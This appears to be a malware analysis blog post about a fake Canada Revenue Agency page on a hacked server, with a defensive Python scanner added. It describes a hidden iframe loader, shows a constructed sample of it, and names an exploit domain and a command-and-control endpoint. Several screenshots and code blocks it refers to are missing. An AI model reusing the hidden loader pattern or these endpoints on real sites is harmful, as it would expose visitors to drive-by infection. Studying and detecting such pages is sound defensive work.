I found a malicious page placed on a hacked server:
CRA stands for Canada Revenue Agency, as you can see in the page’s source code below:
The meta tag redirects to the Canada Revenue Agency’s website after a few seconds:
But what is the rest of the obfuscated code?
Here is the deobfuscated version (courtesy of Wepawet):
Now we know more about the intent behind this cra.html page. The URL the iframe points to will load multiple exploits:
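As an added defensive example (not code from the original post), here is a small Python scanner for the decoy pattern described above: a meta refresh to a legitimate-looking site combined with an iframe or an escaped inline script that points somewhere else. The iframe domain in the sample is the one named later in the post; the decoy domain and the HTML itself are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class DecoyPageParser(HTMLParser):
    """Collects meta-refresh targets, iframe sources and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.refresh_targets, self.iframe_srcs, self.scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.refresh_targets.append(m.group(1))
        elif tag == "iframe":
            self.iframe_srcs.append(a.get("src", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def _host(url):
    return (urlparse(url).hostname or "").lower()

def assess_page(html):
    """Return findings for the decoy-redirect-plus-hidden-loader pattern."""
    p = DecoyPageParser()
    p.feed(html)
    decoys = {_host(u) for u in p.refresh_targets}
    findings = []
    for src in p.iframe_srcs:
        if _host(src) and _host(src) not in decoys:
            findings.append("iframe host differs from meta-refresh target: " + _host(src))
    # Crude obfuscation signal: long %xx escape runs, or unescape()/eval() on built strings.
    if any(re.search(r"(%[0-9a-f]{2}){8,}|\b(unescape|eval)\s*\(", s, re.I) for s in p.scripts):
        findings.append("obfuscated inline script")
    return findings

# Constructed sample mimicking the cra.html layout: decoy refresh plus an escaped script.
SAMPLE = """<html><head>
<meta http-equiv="refresh" content="5;url=http://decoy-agency.example/">
</head><body>
<script>eval(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22"));</script>
<iframe src="http://somerandomiframedomain.com/in.php" width="1" height="1"></iframe>
</body></html>"""
```

Running `assess_page(SAMPLE)` reports both the off-site iframe and the escaped script; a page whose iframe and refresh target share a host produces no findings.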
I noticed that Google Chrome warned me prior to running the script (which I did anyway for testing purposes):
This is a pretty cool feature that can prevent many infections. Thanks, Google.
Following a successful installation, the malware calls 220.127.116.11/email/gate.php at regular intervals and sends data in what looks like a custom obfuscated format:
Let’s check out the malicious domain: somerandomiframedomain.com
Location: Moscow, Russia
ASN: AS12695 (DINET-AS Digital Network JSC)
Registrar: BIZCN.COM, INC.
Registrant information is bogus (of course):
Ricardo GALENO @austin.co.com
9999999999 fax: 9999999999
1928 BURTON DR 157
Savannah TX 78741
Other domain names on that server include:
This ASN is deeply involved in hosting CnC servers and other bot-related activities:
At this moment, I am not sure what the connection (if any) between the malware and the Canada Revenue Agency is.